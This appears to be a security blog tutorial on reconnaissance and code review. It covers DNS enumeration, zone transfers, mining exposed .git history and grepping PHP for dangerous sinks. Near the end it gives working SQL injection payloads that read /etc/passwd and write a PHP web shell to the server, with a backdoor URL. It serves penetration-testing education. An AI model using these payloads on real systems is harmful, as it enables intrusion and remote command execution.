Reconnaissance: Advanced OSINT and Code Review Techniques

Reconnaissance is the foundation of any successful security assessment. The goal is to map the attack surface - every possible entry point where an attacker can interact with a system. This includes exposed domains, subdomains, services, misconfigurations, and even hidden code paths.

This guide covers practical techniques for DNS enumeration, zone transfers, Git repository analysis, and manual code review to uncover vulnerabilities before they are exploited.

Check DNS TXT Records

TXT records are often used for domain ownership verification (e.g., Google Workspace, AWS, Let's Encrypt) or service configuration (SPF, DKIM, DMARC).

Always check them during reconnaissance:

dig txt example.com

They may reveal:

  • Third-party services in use
  • Domain verification tokens
  • Internal infrastructure hints

Subdomain Enumeration

Discover hidden subdomains using automated tools and wordlists:

amass enum -d example.com
ffuf -u https://FUZZ.example.com -w /path/to/wordlist.txt

Common targets include:

  • dev.example.com
  • admin.example.com
  • internal.example.com

DNS Zone Transfer (AXFR)

DNS zone transfers are used to synchronize DNS servers. They are normally restricted to authorized secondary servers, but if misconfigured they can leak the entire internal DNS structure.

Test for AXFR vulnerability:

dnsrecon -d z.hackycorp.com -t axfr

To manually check:

  1. Find the name server:
     dig ns example.com
  2. Attempt a zone transfer for a suspected internal zone:
     dig axfr int @ns1.example.com

Success reveals internal hosts like db.int, mail.int, etc.

Check DNS Server Version

Identify the BIND version for potential exploitation:

dnsrecon -d example.com
dig +short -c chaos -t txt version.bind @ns1.example.com

Outdated versions may have known vulnerabilities.

Analyze Git Repository History

If a .git directory is exposed, you can clone and inspect the full history:

git clone https://example.com/.git
git log --diff-filter=D --summary   # commits that deleted files, with the deleted paths
git show <commit>                   # view a commit and its diff
git show <commit>^:<path>           # print a deleted file as it was in the parent commit

Deleted files may contain secrets, credentials, or sensitive logic.

Manual Code Review Techniques

When source code is available, perform a structured review.

Search for Dangerous Patterns

Use grep to find high-risk functions. For PHP:

grep -R 'system(\$_' *
grep -R 'exec\|shell_exec\|passthru' *
grep -R '\$_GET\|\$_POST\|\$_REQUEST\|\$_COOKIE' *

Track User Input

Follow all user-controlled inputs through the application:

  • $_GET, $_POST, $_REQUEST - HTTP parameters
  • $_COOKIE - user cookies
  • $_SERVER - server/environment data

Look for unsafe usage without validation, escaping, or sanitization.
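The two steps above (pattern search, then input tracking) can be combined into a first-pass static check. The following script is an added example, not code from the original page: it scans PHP source for the command-execution sinks listed above and reports calls that receive a superglobal directly, or through a variable assigned from one without passing through escapeshellarg()/escapeshellcmd(). The PHP snippet inside it is constructed for the demonstration.

```python
import re

# Constructed PHP sample (not from any real project); line numbers start at <?php.
PHP_SAMPLE = r'''<?php
$host = $_GET['host'];
system("ping -c 1 " . $host);
$safe = escapeshellarg($_POST['file']);
echo shell_exec("ls " . $safe);
passthru("cat " . $_REQUEST['page']);
$n = (int) $_COOKIE['n'];
exec("id");
'''

SUPERGLOBAL = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b')
SINK = re.compile(r'\b(system|exec|shell_exec|passthru)\s*\(')
ESCAPE = re.compile(r'\b(?:escapeshellarg|escapeshellcmd)\s*\(')
ASSIGN = re.compile(r'\s*(\$\w+)\s*=\s*(.*);')

def find_tainted_sinks(src):
    """Return (line_no, sink, reason) for sink calls that receive user input.

    A sink is flagged when its line holds a superglobal directly, or a variable
    assigned earlier from a superglobal without escapeshellarg()/escapeshellcmd().
    Deliberately simple, line-based taint tracking for triaging grep hits.
    """
    tainted = set()            # variables currently holding unescaped user input
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = ASSIGN.match(line)
        if m:
            var, rhs = m.groups()
            if SUPERGLOBAL.search(rhs) and not ESCAPE.search(rhs):
                tainted.add(var)
            else:
                tainted.discard(var)      # reassigned from something clean
        sink = SINK.search(line)
        if not sink:
            continue
        if SUPERGLOBAL.search(line) and not ESCAPE.search(line):
            findings.append((no, sink.group(1), 'superglobal passed directly'))
            continue
        for var in re.findall(r'\$\w+', line):
            if var in tainted:
                findings.append((no, sink.group(1), f'tainted variable {var}'))
                break
    return findings

if __name__ == '__main__':
    print(*find_tainted_sinks(PHP_SAMPLE), sep='\n')
```

Each hit is a candidate for manual review, not a confirmed bug: the check is line-based and does not follow data across functions or files.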

Functional Review

Focus on critical functionality:

  • Password reset
  • Authentication logic
  • Database access
  • File upload/download

What to Look For

  • Strange behavior - unexpected responses or logic
  • Missing checks - no input validation, authentication, or authorization
  • Complexity - overly complex code may hide flaws
  • Security controls in place - are they properly implemented?
  • Differences between functions - inconsistent handling of data
  • Conditionals (if/else) - potential logic flaws
  • Regular expressions - weak patterns or ReDoS vulnerabilities

Common Vulnerabilities to Detect

SQL Injection (SQLi)

Test for file read via UNION-based SQLi (if DB user has privileges):

0%20union%20select%201,2,load_file("/etc/passwd"),4

Web Shell Upload via SQLi

Write a PHP web shell to a writable directory (e.g., /css):

id=1%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22
id=1%20union%20select%201,2,%22%3C?php%20system($_GET['c']);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

This creates a backdoor accessible at https://example.com/css/z.php?c=whoami.

Published on Aug 21, 2025